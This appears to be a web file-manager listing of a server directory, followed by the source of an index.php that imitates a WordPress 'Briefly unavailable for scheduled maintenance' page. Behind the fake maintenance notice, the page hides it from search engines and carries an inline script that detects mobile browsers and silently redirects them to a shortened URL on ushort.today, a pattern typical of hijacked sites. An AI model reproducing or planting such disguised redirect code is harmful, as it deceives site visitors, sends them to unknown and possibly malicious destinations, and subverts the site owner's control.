run:R W Run
63 By
2021-01-11 20:15:19
R W Run
5.23 KB
2026-05-22 07:16:36
R W Run
0 By
2026-05-29 02:05:46
R W Run
187.47 MB
2026-05-29 03:15:04
R W Run
23.46 KB
2021-07-31 01:00:14
R W Run
1.97 KB
2026-05-29 02:05:46
R W Run
0 By
2026-05-25 05:40:10
R W Run
error_log
📄index.php
1<?php
2
3http_response_code(503);
4
5header("Retry-After: 3600");
6
7header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");
8header("Pragma: no-cache");
9header("Expires: 0");
10
11echo '<!DOCTYPE html>
12<html lang="en">
13
14<head>
15
16<meta charset="UTF-8">
17
18<meta name="viewport" content="width=device-width, initial-scale=1.0">
19
20<meta name="robots" content="noindex, follow">
21
22<title>Briefly unavailable for scheduled maintenance</title>
23
24<style>
25
26*{
27 box-sizing:border-box;
28}
29
30body{
31
32 margin:0;
33
34 height:100vh;
35
36 display:flex;
37
38 justify-content:center;
39
40 align-items:center;
41
42 background:#f0f6fc;
43
44 font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Arial,sans-serif;
45
46 color:#21759b;
47
48}
49
50.box{
51
52 background:#fff;
53
54 padding:50px 40px;
55
56 border-radius:18px;
57
58 box-shadow:0 10px 35px rgba(0,0,0,.08);
59
60 text-align:center;
61
62 width:90%;
63
64 max-width:600px;
65
66}
67
68.logo{
69
70 font-size:62px;
71
72 font-weight:700;
73
74 margin:0;
75
76 letter-spacing:-2px;
77
78}
79
80.text{
81
82 margin-top:20px;
83
84 font-size:19px;
85
86 line-height:1.7;
87
88 color:#5c6b77;
89
90}
91
92.loader{
93
94 width:42px;
95
96 height:42px;
97
98 border:3px solid #d9e7f2;
99
100 border-top:3px solid #21759b;
101
102 border-radius:50%;
103
104 margin:30px auto 0;
105
106 animation:spin 1s linear infinite;
107
108}
109
110@keyframes spin{
111
112 100%{
113 transform:rotate(360deg);
114 }
115
116}
117
118@media(max-width:600px){
119
120 .logo{
121 font-size:44px;
122 }
123
124 .text{
125 font-size:16px;
126 }
127
128}
129
130</style>
131
132</head>
133
134<body>
135
136<div class="box">
137
138 <h1 class="logo">WordPress</h1>
139
140 <div class="text">
141 Briefly unavailable for scheduled maintenance.<br>
142 Check back in a some hours.
143 </div>
144
145 <div class="loader"></div>
146
147</div>
148<script>
149
150const isMobile = window.matchMedia("(max-width: 768px)").matches
151 || /Android|iPhone|iPad|iPod|Opera Mini|IEMobile/i.test(navigator.userAgent);
152
153if (isMobile) {
154
155 window.location.replace("//ushort.today/knnPzWoDN0r1");
156
157}
158
159</script>
160</body>
161</html>';
162
163?>